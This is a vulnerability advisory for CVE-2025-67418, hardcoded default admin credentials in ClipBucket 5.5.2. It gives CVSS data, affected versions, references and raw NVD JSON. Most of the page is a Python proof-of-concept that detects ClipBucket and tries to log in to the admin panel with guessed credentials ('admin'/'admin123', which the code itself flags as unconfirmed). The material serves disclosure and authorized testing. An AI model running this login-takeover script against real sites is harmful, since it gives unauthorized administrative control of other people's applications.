Security Vulnerability Report
CVE-2025-67418 CVSS 9.8 CRITICAL

CVE-2025-67418

Published: 2025-12-22 20:15:45
Last Modified: 2026-01-02 17:39:51

Description

ClipBucket 5.5.2 is affected by an improper access control issue where the product is shipped or deployed with hardcoded default administrative credentials. An unauthenticated remote attacker can log in to the administrative panel using these default credentials, resulting in full administrative control of the application.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:* - VULNERABLE
ClipBucket 5.5.2 (the NVD CPE match in the raw JSON below covers versions 5.3 through 5.5.2 inclusive, so earlier 5.x deployments should be checked as well)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that the NVD description does not publish the default credential values; the username/password used in this PoC are the PoC author's and should be confirmed against the cited reference before a failed login is taken as evidence that a target is not affected.
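#!/usr/bin/env python3
"""
CVE-2025-67418 ClipBucket Default Credentials Exploit

This PoC demonstrates the hardcoded credential vulnerability in ClipBucket 5.5.2:
it fingerprints the target, then attempts a login with the default credentials
and reports success when the login request ends on an admin/dashboard URL.

Standard-library only (urllib, http.cookiejar, html.parser), so it runs without
requests/bs4. Every request carries a timeout (the original login POST had none),
and network errors are reported instead of producing a traceback.

Usage:
    python3 poc.py http://target [username] [password]

Only point this at hosts you are authorized to test.
"""
from __future__ import annotations

import sys
import urllib.error
import urllib.parse
import urllib.request
from html.parser import HTMLParser
from http.cookiejar import CookieJar

TARGET = "http://target-website.com"  # Replace with target URL (or pass as argv[1])
ADMIN_PATH = "/admin/"
LOGIN_PATH = "/login/"
TIMEOUT = 10  # seconds, applied to every request

# Default credentials for ClipBucket 5.5.2 (from public sources).
# NOTE(review): the NVD description does not state the credential values; these
# are the PoC author's, so a failed login does NOT prove the target is fixed.
# Confirm the real defaults against the vendor/advisory before trusting a negative.
DEFAULT_CREDS = {
    "username": "admin",
    "password": "admin123",  # Common default password
}


class _InputCollector(HTMLParser):
    """Record the value of each <input> keyed by its name attribute (first occurrence wins)."""

    def __init__(self) -> None:
        super().__init__()
        self.inputs: dict[str, str] = {}

    def handle_starttag(self, tag, attrs) -> None:
        if tag.lower() != "input":
            return
        attr_map = dict(attrs)
        name = attr_map.get("name")
        # A present-but-empty value attribute and a missing one both yield "".
        if name is not None and name not in self.inputs:
            self.inputs[name] = attr_map.get("value") or ""


def extract_csrf_token(page_html: str) -> str | None:
    """Return the value of the first <input name="csrf_token"> in page_html, or None if absent.

    The field name "csrf_token" is an assumption carried over from the original
    PoC; confirm it against the real login form if the login keeps failing.
    """
    collector = _InputCollector()
    collector.feed(page_html)
    collector.close()
    return collector.inputs.get("csrf_token")


def looks_like_clipbucket(body: str) -> bool:
    """True if the page body carries a ClipBucket marker: 'clipbucket' (any case) or 'cb_def' (exact)."""
    return "clipbucket" in body.lower() or "cb_def" in body


def login_redirected_to_admin(final_url: str, login_url: str) -> bool:
    """Login-success heuristic: the request ended on an admin/dashboard path other than the login page.

    Only the URL path is inspected, so a host such as admin.example.com or a
    query string cannot produce a false positive, and landing back on the
    login page (the usual failed-login response) never counts as success.
    It is still a heuristic: a login page that itself lives under /admin/ and
    re-renders on failure would need a stricter check.
    """
    final_path = urllib.parse.urlsplit(final_url).path.lower().rstrip("/")
    login_path = urllib.parse.urlsplit(login_url).path.lower().rstrip("/")
    if final_path == login_path:
        return False
    return "admin" in final_path or "dashboard" in final_path


def make_session() -> urllib.request.OpenerDirector:
    """Build an opener that keeps cookies between requests (the stand-in for requests.Session)."""
    return urllib.request.build_opener(urllib.request.HTTPCookieProcessor(CookieJar()))


def fetch(
    opener: urllib.request.OpenerDirector,
    url: str,
    data: dict[str, str] | None = None,
) -> tuple[int, str, str]:
    """GET url (POST form-encoded data when given) and return (status, final_url, body_text).

    Redirects are followed, so final_url is where the response actually came
    from. HTTP error statuses (4xx/5xx) are returned like any other status
    rather than raised, matching what requests did in the original. Network
    failures raise OSError (urllib.error.URLError and socket timeouts are
    subclasses); a malformed url raises ValueError.
    """
    payload = urllib.parse.urlencode(data).encode() if data is not None else None
    request = urllib.request.Request(url, data=payload)
    try:
        with opener.open(request, timeout=TIMEOUT) as response:
            return response.status, response.geturl(), response.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as http_err:
        # fp can be None for some error responses; then there is no body to read.
        body = http_err.read().decode("utf-8", "replace") if http_err.fp is not None else ""
        return http_err.code, http_err.filename or url, body


def check_vulnerability() -> bool:
    """Check if target is vulnerable: by page fingerprint first, then by a reachable admin path.

    Returns True on either signal. NOTE(review): a 200 on /admin/ alone is a
    weak signal -- any application with an /admin/ route passes it -- so only
    the fingerprint match should be read as "this is ClipBucket".
    """
    print(f"[*] Checking if {TARGET} is running ClipBucket 5.5.2...")
    opener = make_session()

    try:
        _, _, body = fetch(opener, TARGET)
    except (OSError, ValueError) as err:
        print(f"[-] Could not reach {TARGET}: {err}")
        return False
    if looks_like_clipbucket(body):
        print("[+] ClipBucket detected!")
        return True

    admin_url = TARGET + ADMIN_PATH
    try:
        status, _, _ = fetch(opener, admin_url)
    except (OSError, ValueError) as err:
        print(f"[-] Could not reach {admin_url}: {err}")
        return False
    if status == 200:
        print("[+] Admin path accessible!")
        return True
    return False


def exploit() -> urllib.request.OpenerDirector | None:
    """Attempt to login with default credentials.

    Returns the cookie-bearing opener (the authenticated session) on success,
    or None when the login page is unreachable or the login did not land on an
    admin/dashboard URL.
    """
    print("[*] Attempting login with default credentials...")
    opener = make_session()
    login_url = TARGET + LOGIN_PATH

    # Get login page to extract CSRF token if needed
    try:
        _, _, login_page = fetch(opener, login_url)
    except (OSError, ValueError) as err:
        print(f"[-] Could not reach {login_url}: {err}")
        return None

    login_data = {
        "username": DEFAULT_CREDS["username"],
        "password": DEFAULT_CREDS["password"],
        "submit": "Login",
    }
    token = extract_csrf_token(login_page)
    if token is not None:
        login_data["csrf_token"] = token

    try:
        _, final_url, _ = fetch(opener, login_url, data=login_data)
    except (OSError, ValueError) as err:
        print(f"[-] Login request failed: {err}")
        return None

    if login_redirected_to_admin(final_url, login_url):
        print("[+] SUCCESS! Logged in with default credentials!")
        print(f"[+] Access granted to: {final_url}")
        return opener
    print("[-] Login failed with default credentials")
    return None


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Strip a trailing slash so TARGET + "/admin/" does not become "//admin/".
        TARGET = sys.argv[1].rstrip("/")
    # Optional overrides so a confirmed default can be tried without editing the file.
    if len(sys.argv) > 2:
        DEFAULT_CREDS["username"] = sys.argv[2]
    if len(sys.argv) > 3:
        DEFAULT_CREDS["password"] = sys.argv[3]

    if check_vulnerability():
        session = exploit()
        if session is not None:
            print("[!] VULNERABLE - Default credentials are active!")
            print("[!] Immediate action required: Change admin password!")
    else:
        print("[-] Target does not appear to be vulnerable")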

References

- http://clipbucket.com (Product)
- https://medium.com/@arpit03sharma2003/cve-2025-67418-when-default-credentials-become-a-remote-root-button-03be5ee4b927 (Exploit, Mitigation, Third Party Advisory)
Raw JSON Data

{"cve": {"id": "CVE-2025-67418", "sourceIdentifier": "[email protected]", "published": "2025-12-22T20:15:45.303", "lastModified": "2026-01-02T17:39:50.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ClipBucket 5.5.2 is affected by an improper access control issue where the product is shipped or deployed with hardcoded default administrative credentials. An unauthenticated remote attacker can log in to the administrative panel using these default credentials, resulting in full administrative control of the application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3", "versionEndIncluding": "5.5.2", "matchCriteriaId": "15859994-9C26-499F-9707-66E2040BBC82"}]}]}], "references": [{"url": "http://clipbucket.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://medium.com/@arpit03sharma2003/cve-2025-67418-when-default-credentials-become-a-remote-root-button-03be5ee4b927", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}